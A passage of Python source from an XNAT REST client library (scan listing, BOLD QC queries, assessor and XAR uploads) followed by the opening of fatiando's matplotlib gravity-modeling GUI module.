    params = {
        'columns': ','.join(srscans.columns.keys())
    }
    _, response = _get(auth, path, 'json', autobox=True, params=params)
    for row in response['ResultSet']['Result']:
        # rows for other scan types come back with an empty srscandata id
        if not row['xnat:srscandata/id']:
            continue
        # fix: identity comparison with None (was "scan_ids == None")
        if scan_ids is None or row['xnat:srscandata/id'] in scan_ids:
            yield {v: row[k] for k, v in srscans.columns.items()}
# Maps XNAT REST column names to the dictionary keys yielded by srscans().
srscans.columns = {
    "ID": "ID",
    "insert_date": "date_archived",
    "insert_user": "archiver",
    "xnat:imagesessiondata/operator": "operator",
    "xnat:srscandata/id": "id",
    "xnat:srscandata/quality": "quality",
    "xnat:srscandata/note": "note",
    "xnat:srscandata/type": "type",
    "xnat:srscandata/series_description": "series_description",
    "xnat:srscandata/scanner": "scanner",
    "xnat:srscandata/scanner/manufacturer": "scanner_manufacturer",
    "xnat:srscandata/scanner/model": "scanner_model"
}
def scscans(auth, label=None, scan_ids=None, project=None, experiment=None):
    '''
    Get secondary-capture (xnat:scScanData) scan information for a session as
    a sequence of dictionaries. Mirrors :func:`mrscans`.
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Session label
    :type label: str
    :param scan_ids: Scan numbers to return; None returns all
    :type scan_ids: list
    :param project: XNAT Session project
    :type project: str
    :param experiment: YAXIL Experiment
    :type experiment: :mod:`yaxil.Experiment`
    :returns: Generator of scan data dictionaries
    :rtype: dict
    '''
    if experiment and (label or project):
        raise ValueError('cannot supply experiment with label or project')
    if experiment:
        label, project = experiment.label, experiment.project
    aid = accession(auth, label, project)
    path = f'/data/experiments/{aid}/scans'
    # NOTE(review): unlike the other scan handlers, this query also constrains
    # by xsiType and session ID — confirm whether that is intentional
    params = {
        'xsiType': 'xnat:mrSessionData',
        'xnat:mrSessionData/ID': aid,
        'columns': ','.join(scscans.columns.keys())
    }
    _, response = _get(auth, path, 'json', autobox=True, params=params)
    for row in response['ResultSet']['Result']:
        # rows for other scan types come back with an empty scscandata id
        if not row['xnat:scscandata/id']:
            continue
        # fix: identity comparison with None (was "scan_ids == None")
        if scan_ids is None or row['xnat:scscandata/id'] in scan_ids:
            yield {v: row[k] for k, v in scscans.columns.items()}
# Maps XNAT REST column names to the dictionary keys yielded by scscans().
scscans.columns = {
    "ID": "ID",
    "insert_date": "date_archived",
    "insert_user": "archiver",
    "xnat:imagesessiondata/operator": "operator",
    "xnat:scscandata/id": "id",
    "xnat:scscandata/quality": "quality",
    "xnat:scscandata/note": "note",
    "xnat:scscandata/type": "type",
    "xnat:scscandata/series_description": "series_description",
    "xnat:scscandata/scanner": "scanner",
    "xnat:scscandata/scanner/manufacturer": "scanner_manufacturer",
    "xnat:scscandata/scanner/model": "scanner_model"
}
def odscans(auth, label=None, scan_ids=None, project=None, experiment=None):
    '''
    Get other-DICOM (xnat:otherDicomScanData) scan information for a session
    as a sequence of dictionaries. Mirrors :func:`mrscans`.
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Session label
    :type label: str
    :param scan_ids: Scan numbers to return; None returns all
    :type scan_ids: list
    :param project: XNAT Session project
    :type project: str
    :param experiment: YAXIL Experiment
    :type experiment: :mod:`yaxil.Experiment`
    :returns: Generator of scan data dictionaries
    :rtype: dict
    '''
    if experiment and (label or project):
        raise ValueError('cannot supply experiment with label or project')
    if experiment:
        label, project = experiment.label, experiment.project
    aid = accession(auth, label, project)
    path = f'/data/experiments/{aid}/scans'
    params = {
        'columns': ','.join(odscans.columns.keys())
    }
    _, response = _get(auth, path, 'json', autobox=True, params=params)
    for row in response['ResultSet']['Result']:
        # rows for other scan types come back with an empty otherdicomscandata id
        if not row['xnat:otherdicomscandata/id']:
            continue
        # fix: identity comparison with None (was "scan_ids == None")
        if scan_ids is None or row['xnat:otherdicomscandata/id'] in scan_ids:
            yield {v: row[k] for k, v in odscans.columns.items()}
# Maps XNAT REST column names to the dictionary keys yielded by odscans().
odscans.columns = {
    "ID": "ID",
    "insert_date": "date_archived",
    "insert_user": "archiver",
    "xnat:imagesessiondata/operator": "operator",
    "xnat:otherdicomscandata/id": "id",
    "xnat:otherdicomscandata/quality": "quality",
    "xnat:otherdicomscandata/note": "note",
    "xnat:otherdicomscandata/type": "type",
    "xnat:otherdicomscandata/series_description": "series_description",
    "xnat:otherdicomscandata/scanner": "scanner",
    "xnat:otherdicomscandata/scanner/manufacturer": "scanner_manufacturer",
    "xnat:otherdicomscandata/scanner/model": "scanner_model",
}
def scans(auth, label=None, scan_ids=None, project=None, experiment=None):
    '''
    Yield scan metadata dictionaries for every scan in a session, dispatching
    each xsi:type to its registered handler and merging session-level details
    into each yielded dictionary.
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Session label
    :type label: str
    :param scan_ids: Scan numbers to return; None returns all
    :type scan_ids: list
    :param project: XNAT Session project
    :type project: str
    :param experiment: YAXIL Experiment
    :type experiment: :mod:`yaxil.Experiment`
    :returns: Generator of scan data dictionaries
    :rtype: dict
    '''
    if experiment and (label or project):
        raise ValueError('cannot supply experiment with label or project')
    if experiment:
        label, project = experiment.label, experiment.project
    aid = accession(auth, label, project)
    # Getting experiment details like this may not be necessary if
    # https://issues.xnat.org/browse/XNAT-6829 is ever fixed
    details = __experiment_details(auth, aid)
    # A session can mix scan types (xsi:type) that must be requested
    # separately; dispatch each type to its handler
    for xsitype in __get_xsi_types(auth, aid):
        handler = scans.handlers.get(xsitype)
        if handler is None:
            logger.warning('could not find a handler for %s', xsitype)
            continue
        for scan in handler(auth, label, scan_ids, project):
            scan.update(details)
            yield scan
# Registry mapping xsi:type to its scan-listing handler function.
scans.handlers = {
    'xnat:mrScanData': mrscans,
    'xnat:srScanData': srscans,
    'xnat:scScanData': scscans,
    'xnat:otherDicomScanData': odscans
}
def __get_xsi_types(auth, aid):
    '''
    Return the set of xsi:type values present among the scans of an accession.
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param aid: XNAT Accession ID
    :type aid: str
    :returns: distinct xsi:type strings
    :rtype: set
    '''
    path = f'/data/experiments/{aid}/scans'
    params = {
        'columns': 'xsiType'
    }
    # fix: params was built but never passed to _get, so the request went
    # out without the columns constraint
    _, response = _get(auth, path, 'json', autobox=True, params=params)
    return {row['xsiType'] for row in response['ResultSet']['Result']}
def __experiment_details(auth, aid):
    '''
    Fetch session-level details for an accession. Returns a dict built from
    the first matching experiment, or None when nothing matches.
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param aid: XNAT Accession ID
    :type aid: str
    :returns: session detail fields, or None
    :rtype: dict
    '''
    columns = ['URI', 'xsiType', 'ID', 'label', 'project', 'subject_ID',
               'subject_label', 'subject_project', 'date', 'time',
               'fieldStrength']
    params = {
        'ID': aid,
        'columns': ','.join(columns)
    }
    _, response = _get(auth, '/data/experiments', 'json', autobox=True, params=params)
    for row in response['ResultSet']['Result']:
        # only the first matching experiment is ever used
        return {
            'session_uri': row['URI'],
            'xsitype': row['xsiType'],
            'session_id': row['ID'],
            'session_label': row['label'],
            'session_project': row['project'],
            'date_scanned': row['date'],
            'time_scanned': row['time'],
            'subject_id': row['subject_ID'],
            'subject_label': row['subject_label'],
            'subject_project': row['subject_project'],
            'field_strength': row['fieldStrength']
        }
def extendedboldqc(auth, label, scan_ids=None, project=None, aid=None):
    '''
    Get ExtendedBOLDQC data as a sequence of dictionaries.
    Example:
    >>> import yaxil
    >>> import json
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> for eqc in yaxil.extendedboldqc(auth, 'AB1234C'):
    ...   print(json.dumps(eqc, indent=2))
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT MR Session label
    :type label: str
    :param scan_ids: Scan numbers to return; None returns all
    :type scan_ids: list
    :param project: XNAT MR Session project
    :type project: str
    :param aid: XNAT Accession ID
    :type aid: str
    :returns: Generator of scan data dictionaries
    :rtype: :mod:`dict`
    '''
    if not aid:
        aid = accession(auth, label, project)
    path = '/data/experiments'
    params = {
        'xsiType': 'neuroinfo:extendedboldqc',
        'columns': ','.join(extendedboldqc.columns.keys())
    }
    if project:
        params['project'] = project
    params['xnat:mrSessionData/ID'] = aid
    _, response = _get(auth, path, 'json', autobox=True, params=params)
    for row in response['ResultSet']['Result']:
        # fix: identity comparison with None (was "scan_ids == None")
        if scan_ids is None or row['neuroinfo:extendedboldqc/scan/scan_id'] in scan_ids:
            yield {v: row[k] for k, v in extendedboldqc.columns.items()}
# Maps XNAT REST column names (keys) to the friendlier dictionary keys
# (values) yielded by extendedboldqc().
extendedboldqc.columns = {
    "xnat:mrsessiondata/id": "session_id",
    "xnat:mrsessiondata/label": "session_label",
    "xnat:mrsessiondata/project": "project",
    "subject_label": "subject_label",
    "xnat:subjectdata/id": "subject_id",
    "neuroinfo:extendedboldqc/id": "id",
    "neuroinfo:extendedboldqc/scan/scan_id": "scan_id",
    "neuroinfo:extendedboldqc/pipeline/status": "status",
    "neuroinfo:extendedboldqc/scan/n_vols": "nvols",
    "neuroinfo:extendedboldqc/scan/skip": "skip",
    "neuroinfo:extendedboldqc/scan/qc_thresh": "mask_threshold",
    "neuroinfo:extendedboldqc/scan/qc_nvox": "nvoxels",
    "neuroinfo:extendedboldqc/scan/qc_mean": "mean",
    "neuroinfo:extendedboldqc/scan/qc_max": "max",
    "neuroinfo:extendedboldqc/scan/qc_min": "min",
    "neuroinfo:extendedboldqc/scan/qc_stdev": "stdev",
    "neuroinfo:extendedboldqc/scan/qc_ssnr": "ssnr",
    "neuroinfo:extendedboldqc/scan/qc_vsnr": "vsnr",
    "neuroinfo:extendedboldqc/scan/qc_slope": "slope",
    "neuroinfo:extendedboldqc/scan/mot_n_tps": "mot_n_tps",
    "neuroinfo:extendedboldqc/scan/mot_rel_x_sd": "mot_rel_x_sd",
    "neuroinfo:extendedboldqc/scan/mot_rel_x_max": "mot_rel_x_max",
    "neuroinfo:extendedboldqc/scan/mot_rel_x_1mm": "mot_rel_x_1mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_x_5mm": "mot_rel_x_5mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_y_mean": "mot_rel_y_mean",
    "neuroinfo:extendedboldqc/scan/mot_rel_y_sd": "mot_rel_y_sd",
    "neuroinfo:extendedboldqc/scan/mot_rel_y_max": "mot_rel_y_max",
    "neuroinfo:extendedboldqc/scan/mot_rel_y_1mm": "mot_rel_y_1mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_y_5mm": "mot_rel_y_5mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_z_mean": "mot_rel_z_mean",
    "neuroinfo:extendedboldqc/scan/mot_rel_z_sd": "mot_rel_z_sd",
    "neuroinfo:extendedboldqc/scan/mot_rel_z_max": "mot_rel_z_max",
    "neuroinfo:extendedboldqc/scan/mot_rel_z_1mm": "mot_rel_z_1mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_z_5mm": "mot_rel_z_5mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_xyz_mean": "mot_rel_xyz_mean",
    "neuroinfo:extendedboldqc/scan/mot_rel_xyz_sd": "mot_rel_xyz_sd",
    "neuroinfo:extendedboldqc/scan/mot_rel_xyz_max": "mot_rel_xyz_max",
    "neuroinfo:extendedboldqc/scan/mot_rel_xyz_1mm": "mot_rel_xyz_1mm",
    "neuroinfo:extendedboldqc/scan/mot_rel_xyz_5mm": "mot_rel_xyz_5mm",
    "neuroinfo:extendedboldqc/scan/rot_rel_x_mean": "rot_rel_x_mean",
    "neuroinfo:extendedboldqc/scan/rot_rel_x_sd": "rot_rel_x_sd",
    "neuroinfo:extendedboldqc/scan/rot_rel_x_max": "rot_rel_x_max",
    "neuroinfo:extendedboldqc/scan/rot_rel_y_mean": "rot_rel_y_mean",
    "neuroinfo:extendedboldqc/scan/rot_rel_y_sd": "rot_rel_y_sd",
    "neuroinfo:extendedboldqc/scan/rot_rel_y_max": "rot_rel_y_max",
    "neuroinfo:extendedboldqc/scan/rot_rel_z_mean": "rot_rel_z_mean",
    "neuroinfo:extendedboldqc/scan/rot_rel_z_sd": "rot_rel_z_sd",
    "neuroinfo:extendedboldqc/scan/rot_rel_z_max": "rot_rel_z_max",
    "neuroinfo:extendedboldqc/scan/mot_abs_x_mean": "mot_abs_x_mean",
    "neuroinfo:extendedboldqc/scan/mot_abs_x_sd": "mot_abs_x_sd",
    "neuroinfo:extendedboldqc/scan/mot_abs_x_max": "mot_abs_x_max",
    "neuroinfo:extendedboldqc/scan/mot_abs_y_mean": "mot_abs_y_mean",
    "neuroinfo:extendedboldqc/scan/mot_abs_y_sd": "mot_abs_y_sd",
    "neuroinfo:extendedboldqc/scan/mot_abs_y_max": "mot_abs_y_max",
    "neuroinfo:extendedboldqc/scan/mot_abs_z_mean": "mot_abs_z_mean",
    "neuroinfo:extendedboldqc/scan/mot_abs_z_sd": "mot_abs_z_sd",
    "neuroinfo:extendedboldqc/scan/mot_abs_z_max": "mot_abs_z_max",
    "neuroinfo:extendedboldqc/scan/mot_abs_xyz_mean": "mot_abs_xyz_mean",
    "neuroinfo:extendedboldqc/scan/mot_abs_xyz_sd": "mot_abs_xyz_sd",
    "neuroinfo:extendedboldqc/scan/mot_abs_xyz_max": "mot_abs_xyz_max",
    "neuroinfo:extendedboldqc/scan/rot_abs_x_mean": "rot_abs_x_mean",
    "neuroinfo:extendedboldqc/scan/rot_abs_x_sd": "rot_abs_x_sd",
    "neuroinfo:extendedboldqc/scan/rot_abs_x_max": "rot_abs_x_max",
    "neuroinfo:extendedboldqc/scan/rot_abs_y_mean": "rot_abs_y_mean",
    "neuroinfo:extendedboldqc/scan/rot_abs_y_sd": "rot_abs_y_sd",
    "neuroinfo:extendedboldqc/scan/rot_abs_y_max": "rot_abs_y_max",
    "neuroinfo:extendedboldqc/scan/rot_abs_z_mean": "rot_abs_z_mean",
    "neuroinfo:extendedboldqc/scan/rot_abs_z_sd": "rot_abs_z_sd",
    "neuroinfo:extendedboldqc/scan/rot_abs_z_max": "rot_abs_z_max"
}
def _get(auth, path, fmt, autobox=True, params=None):
    '''
    Issue a GET request to the XNAT REST API and optionally box the response
    content into an appropriate data structure.
    Example:
    >>> import yaxil
    >>> from yaxil import Format
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> yaxil.get(auth, '/data/experiments', Format.JSON)
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param path: API URL path
    :type path: str
    :param fmt: API result format
    :type fmt: :mod:`yaxil.Format`
    :param autobox: Autobox response content into an appropriate reader or other data structure
    :type autobox: bool
    :param params: Additional query parameters
    :type params: dict
    :returns: Tuple of (URL, :mod:`dict` | :mod:`xml.etree.ElementTree` | :mod:`csv.reader` | :mod:`str`)
    :rtype: tuple
    :raises RestApiError: on a non-OK or empty response
    '''
    if not params:
        params = {}
    params["format"] = fmt
    url = "%s/%s" % (auth.url.rstrip('/'), path.lstrip('/'))
    logger.debug("issuing http request %s", url)
    logger.debug("query parameters %s", params)
    r = requests.get(url, params=params, auth=basicauth(auth), verify=CHECK_CERTIFICATE)
    if r.status_code != requests.codes.ok:
        raise RestApiError("response not ok (%s) from %s" % (r.status_code, r.url))
    if not r.content:
        raise RestApiError("response is empty from %s" % r.url)
    if autobox:
        return r.url, _autobox(r.text, fmt)
    return r.url, r.content
def _autobox(content, format):
    '''
    Autobox response content.
    :param content: Response content (text)
    :type content: str
    :param format: Format to return
    :type format: `yaxil.Format`
    :returns: Autoboxed content
    :rtype: dict|xml.etree.ElementTree.Element|csvreader
    :raises AutoboxError: if the format is not recognized
    '''
    if format == Format.JSON:
        return json.loads(content)
    elif format == Format.XML:
        return etree.fromstring(content)
    elif format == Format.CSV:
        # fix: content is text in Python 3, so feed csv.reader a StringIO
        # directly; the previous fallback used the Python-2-only unicode()
        # builtin and raised NameError when the returned reader was consumed
        return csv.reader(io.StringIO(content))
    else:
        raise AutoboxError("unknown autobox format %s" % format)
def exists(auth, xnatid, datatype='experiments'):
    '''
    Test if an object exists
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param xnatid: XNAT object ID
    :type xnatid: str
    :param datatype: XNAT data type
    :type datatype: str
    :returns: True or False
    :rtype: bool
    '''
    base = auth.url.rstrip('/')
    url = f'{base}/data/{datatype}/{xnatid}'
    logger.debug('issuing http request %s', url)
    response = requests.get(
        url,
        auth=basicauth(auth),
        verify=CHECK_CERTIFICATE
    )
    # An OK status means the object is present; anything else counts as absent.
    return response.status_code == requests.codes.ok
def has(auth, xsitype, project=None):
    '''
    Test if a project contains any items of a particular xsi:type.
    Example:
    >>> import yaxil
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> yaxil.has(auth, 'neuroinfo:extendedboldqc', project='MyProject')
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param xsitype: XNAT xsi:type
    :type xsitype: str
    :param project: XNAT Project
    :type project: str
    :returns: True or False
    :rtype: bool
    :raises ResultSetError: if the response result set is malformed
    '''
    path = "/data/experiments"
    params = {
        "xsiType": xsitype,
        "columns": 'ID'
    }
    if project:
        params["project"] = project
    url, result = _get(auth, path, Format.JSON, autobox=True, params=params)
    try:
        __quick_validate(result)
    except ResultSetError as e:
        # Exception.message was removed in Python 3; interpolating the
        # exception itself yields str(e), which is what was intended.
        raise ResultSetError("%s in response from %s" % (e, url))
    return int(result["ResultSet"]["totalRecords"]) != 0
def storexar_cli(auth, archive):
    '''
    StoreXAR through command line utility
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param archive: Filesystem location of ZIP (XAR) archive
    :type archive: str
    :raises CommandNotFoundError: if the StoreXAR utility is not on PATH
    :raises sp.CalledProcessError: if StoreXAR exits non-zero
    '''
    StoreXAR = commons.which('StoreXAR')
    if not StoreXAR:
        raise CommandNotFoundError('StoreXAR not found')
    archive = os.path.abspath(archive)
    popd = os.getcwd()
    # StoreXAR must be executed from its own directory
    os.chdir(os.path.dirname(StoreXAR))
    cmd = [
        'sh',
        'StoreXAR',
        '-host', auth.url,
        '-u', auth.username,
        '-p', auth.password,
        '-f', archive
    ]
    try:
        logger.debug(cmd)
        output = sp.check_output(cmd, stderr=sp.PIPE).decode()
        if 'Upload Completed' in output:
            logger.info('XAR upload complete')
    except sp.CalledProcessError as e:
        logger.error(e.stdout)
        logger.error(e.stderr)
        raise e
    finally:
        # Always restore the caller's working directory; previously a
        # CalledProcessError re-raise left the process chdir'd away.
        os.chdir(popd)
def storerest(auth, artifacts_dir, resource_name):
    '''
    Store data into XNAT over REST API
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param artifacts_dir: Filesystem location of assessor artifacts
    :type artifacts_dir: str
    :param resource_name: Resource name
    :type resource_name: str
    :raises StoreRESTError: if the assessor, resource folder, or any
        resource file fails to upload
    '''
    assessment = os.path.join(artifacts_dir, 'assessor', 'assessment.xml')
    resources = os.path.join(artifacts_dir, 'resources')
    # parse assessor and session ID from assessment.xml
    with open(assessment) as fo:
        root = etree.parse(fo)
    aid = root.find('.').attrib['ID']
    sid = root.findall('.//{http://nrg.wustl.edu/xnat}imageSession_ID').pop().text
    logger.debug(f'assessor id={aid}')
    logger.debug(f'session id={sid}')
    baseurl = auth.url.rstrip('/')
    # create (post) new image assessor
    url = f'{baseurl}/data/experiments/{sid}/assessors'
    logger.debug(f'posting {assessment} to {url}')
    # context manager closes the handle after upload (previously leaked)
    with open(assessment, 'rb') as fo:
        r = requests.post(
            url,
            auth=(auth.username, auth.password),
            files={
                'file': fo
            },
            allow_redirects=True
        )
    if r.status_code == requests.codes.ok:
        logger.debug(f'assessment {aid} uploaded successfully')
    elif r.status_code == requests.codes.conflict:
        # conflict means the assessor already exists; nothing more to do
        logger.debug(f'assessment {aid} likely already exists')
        return
    else:
        raise StoreRESTError(f'assessment {assessment} failed to upload ({r.status_code})')
    # create (put) new image assessor resource folder
    url = f'{baseurl}/data/experiments/{sid}/assessors/{aid}/resources/{resource_name}'
    logger.debug('PUT %s', url)
    r = requests.put(
        url,
        auth=(auth.username, auth.password),
        allow_redirects=True
    )
    if r.status_code == requests.codes.ok:
        logger.debug(f'resource folder created {resource_name}')
    elif r.status_code == requests.codes.conflict:
        logger.debug(f'resource folder {resource_name} likely already exists')
    else:
        raise StoreRESTError(f'could not create resource folder {resource_name} ({r.status_code})')
    # upload (put) image assessor resource files
    for resource in os.listdir(resources):
        resource_dir = os.path.join(resources, resource)
        for f in os.listdir(resource_dir):
            fullfile = os.path.join(resource_dir, f)
            url = f'{baseurl}/data/experiments/{sid}/assessors/{aid}/resources/{resource_name}/files/{resource}/{f}'
            logger.debug('PUT %s', url)
            # close each file handle promptly (previously leaked per file)
            with open(fullfile, 'rb') as fo:
                r = requests.put(
                    url,
                    auth=(auth.username, auth.password),
                    files={
                        'file': fo
                    },
                    allow_redirects=True
                )
            if r.status_code == requests.codes.ok:
                logger.debug(f'file {fullfile} was stored successfully as {resource}')
            elif r.status_code == requests.codes.conflict:
                logger.debug(f'resource {resource} likely already exists')
            else:
                raise StoreRESTError(f'could not store resource file {fullfile} ({r.status_code})')
class StoreRESTError(Exception):
    '''Raised when storing an assessor over the XNAT REST API fails.'''
    pass
def storexar(auth, archive, verify=True):
    '''
    StoreXAR implementation
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param archive: Filesystem location of ZIP (XAR) archive
    :type archive: str
    :param verify: Verify TLS certificates
    :type verify: bool
    :raises StoreXARError: if session creation or the upload fails
    '''
    # soap envelope
    envelope = '''<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <soapenv:Body>
      <execute soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" />
   </soapenv:Body>
</soapenv:Envelope>'''
    with requests.Session() as s:
        # determine whether URL will be redirected
        redir_url = requests.head(auth.url, allow_redirects=True, verify=verify).url
        # create axis session
        logger.debug('creating soap service session')
        url = redir_url.rstrip('/') + '/axis/CreateServiceSession.jws'
        r = s.post(
            url,
            data=envelope,
            headers={
                'User-Agent': 'Axis/1.3',
                'SOAPAction': '""'
            },
            auth=basicauth(auth),
            verify=verify
        )
        if r.history:
            for i,resp in enumerate(r.history):
                logger.debug('SOAP service redirect #%i: %s to %s', i, resp.status_code, resp.url)
        logger.debug('SOAP service session url: %s', r.url)
        logger.debug('SOAP service session status: %s', r.status_code)
        logger.debug('SOAP service session body: %s', r.text)
        logger.debug('SOAP service session headers: \n%s', r.headers)
        logger.debug('Session cookies: \n%s', requests.utils.dict_from_cookiejar(s.cookies))
        if r.status_code != requests.codes.ok:
            raise StoreXARError('response not ok (%s) from %s' % (r.status_code, r.url))
        # post the xar archive
        logger.debug('posting xar archive')
        url = redir_url.rstrip('/') + '/app/template/StoreXAR.vm'
        # context manager closes the archive handle (previously leaked)
        with open(archive, 'rb') as fo:
            r = s.post(
                url,
                verify=verify,
                files={
                    'archive': (archive, fo, 'application/octet-stream', {})
                }
            )
        if r.history:
            for i,resp in enumerate(r.history):
                logger.debug('XAR archive upload redirect #%i: %s to %s', i, resp.status_code, resp.url)
        logger.debug('XAR archive upload url: %s', r.url)
        logger.debug('XAR archive upload status: %s', r.status_code)
        logger.debug('XAR archive upload body: %s', r.text)
        logger.debug('XAR archive upload headers: \n%s', r.headers)
        if r.status_code != requests.codes.ok:
            raise StoreXARError('response not ok (%s) from %s' % (r.status_code, r.url))
        # check for success string in response content
        if not 'Upload Complete' in r.text:
            raise StoreXARError('response text from %s is\n%s' % (r.url, r.text))
        logger.debug('upload complete')
class StoreXARError(Exception):
    '''Raised when a StoreXAR (SOAP/XAR) upload to XNAT fails.'''
    pass
|
<filename>fatiando/gui/simple.py
"""
Simple GUIs using the interactive capabilities of :mod:`matplotlib`
**Interactive gravimetric modeling**
* :class:`~fatiando.gui.simple.Moulder`
* :class:`~fatiando.gui.simple.BasinTrap`
* :class:`~fatiando.gui.simple.BasinTri`
**Interactive modeling of layered media**
* :class:`~fatiando.gui.simple.Lasagne`
----
"""
import bisect
import numpy
from matplotlib import pyplot, widgets
from .. import utils
from ..gravmag import talwani
from ..mesher import Polygon
from ..seismic import profile
class Moulder():
    """
    Interactive potential field direct modeling in 2D using polygons.
    Uses module :mod:`~fatiando.gravmag.talwani` for computations.
    For the moment only works for the gravity anomaly.
    To run this in a script, use::
        # Define the area of modeling
        area = (0, 1000, 0, 1000)
        # Where the gravity effect is calculated
        xp = range(0, 1000, 10)
        zp = [0]*len(xp)
        # Create the application
        app = Moulder(area, xp, zp)
        # Run it (close the window to finish)
        app.run()
        # and save the calculated gravity anomaly profile
        app.savedata("mydata.txt")
    Parameters:
    * area : list = [xmin, xmax, zmin, zmax]
        Area of the subsurface to use for modeling. Remember, z is positive
        downward
    * xp, zp : array
        Arrays with the x and z coordinates of the computation points
    * gz : array
        The observed gravity values at the computation points.
        Will be plotted as black points together with the modeled (predicted)
        data. If None, will ignore this.
    "The truth is out there"
    """
    # Usage hints shown as the figure title
    instructions = '-'.join(["Click to start drawing",
                             "Choose density using the slider",
                             "Right click to close polygon",
                             "'e' to delete"])
    name = "Moulder - Direct gravimetric modeling"
    def __init__(self, area, xp, zp, gz=None):
        """Set up the figure, axes, sliders and empty model state."""
        if len(zp) != len(xp):
            raise ValueError("xp and zp must have same size")
        # Get the data
        self.area = area
        # Convert model area from meters to km for display
        self.x1, self.x2, z1, z2 = 0.001 * numpy.array(area)
        if gz is not None:
            if len(gz) != len(xp):
                raise ValueError("xp, zp and gz must have same size")
            self.gz = numpy.array(gz)
        else:
            self.gz = gz
        self.xp = numpy.array(xp, dtype='f')
        self.zp = numpy.array(zp, dtype='f')
        # Make the figure
        self.fig = pyplot.figure(figsize=(12, 8))
        self.fig.canvas.set_window_title(self.name)
        self.fig.suptitle(self.instructions)
        self.draw = self.fig.canvas.draw
        # Make the data and model canvas
        self.dcanvas = self.fig.add_subplot(2, 1, 1)
        self.dcanvas.set_ylabel("mGal")
        self.dcanvas.set_xlim(self.x1, self.x2)
        self.dcanvas.grid()
        self.mcanvas = self.fig.add_subplot(2, 1, 2)
        self.mcanvas.set_ylabel("Depth (km)")
        self.mcanvas.set_xlabel("x (km)")
        self.mcanvas.set_xlim(self.x1, self.x2)
        # z axis is inverted so depth increases downward
        self.mcanvas.set_ylim(z2, z1)
        self.mcanvas.grid()
        self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.18,
                                 hspace=0.1)
        # Make the sliders
        sliderax = self.fig.add_axes([0.20, 0.08, 0.60, 0.03])
        self.densslider = widgets.Slider(sliderax, 'Density',
                                         -9, 9, valinit=0.,
                                         valfmt='%1.2f (g/cm3)')
        sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])
        self.errslider = widgets.Slider(sliderax, 'Error',
                                        0, 5, valinit=0.,
                                        valfmt='%1.2f (mGal)')
        # Initialize the data
        self.leg = None
        self.predgz = None
        self.predplot, = self.dcanvas.plot([], [], '-r', linewidth=2)
        if self.gz is not None:
            # NOTE(review): uses the raw xp argument here, not self.xp —
            # a plain Python list for xp would fail on `xp * 0.001`; verify
            self.gzplot, = self.dcanvas.plot(xp * 0.001, gz, 'ok')
        self.nextdens = 1000.
        self.densslider.set_val(self.nextdens * 0.001)
        self.error = 0.
        self.densities = []
        self.polygons = []
        self.nextpoly = []
        self.plotx = []
        self.ploty = []
        self.polyplots = []
        self.polyline, = self.mcanvas.plot([], [], marker='o', linewidth=2)
    def run(self):
        """Start the interactive application (blocks until the window closes)."""
        # Connect the event handlers
        self.picking = False
        self.connect()
        self.update()
        pyplot.show()
    def get_data(self):
        """Return the last predicted gravity anomaly profile."""
        return self.predgz
    def savedata(self, fname):
        """Save xp, zp and predicted gz as columns of a text file."""
        data = numpy.array([self.xp, self.zp, self.predgz]).T
        numpy.savetxt(fname, data, fmt='%.5f')
    def connect(self):
        """Wire the slider callbacks and matplotlib mouse/key events."""
        self.densslider.on_changed(self.set_density)
        self.errslider.on_changed(self.set_error)
        self.fig.canvas.mpl_connect('button_press_event', self.pick)
        self.fig.canvas.mpl_connect('key_press_event', self.key_press)
        self.fig.canvas.mpl_connect('motion_notify_event', self.move)
    def update(self):
        """Recompute the predicted anomaly from the polygons and redraw."""
        if self.polygons:
            polys = []
            for p, d in zip(self.polygons, self.densities):
                # Convert vertices back from km to meters for computation
                polys.append(Polygon(1000. * numpy.array(p), {'density': d}))
            self.predgz = utils.contaminate(
                talwani.gz(self.xp, self.zp, polys), self.error)
        else:
            self.predgz = numpy.zeros_like(self.xp)
        self.predplot.set_data(self.xp * 0.001, self.predgz)
        if self.gz is not None:
            ymin = min(self.predgz.min(), self.gz.min())
            ymax = max(self.predgz.max(), self.gz.max())
        else:
            ymin = self.predgz.min()
            ymax = self.predgz.max()
        if ymin != ymax:
            self.dcanvas.set_ylim(ymin, ymax)
        self.draw()
    def set_density(self, value):
        """Slider callback: store the density (kg/m3) for the next polygon."""
        self.nextdens = 1000. * value
    def set_error(self, value):
        """Slider callback: set the noise level and refresh the prediction."""
        self.error = value
        self.update()
    def move(self, event):
        """Mouse-move handler; no-op here, subclasses draw guides."""
        pass
    def pick(self, event):
        """Mouse handler: left click adds a vertex, right/middle closes
        the polygon (needs at least 3 vertices)."""
        if event.inaxes != self.mcanvas:
            return 0
        x, y = event.xdata, event.ydata
        if (event.button == 1):
            self.picking = True
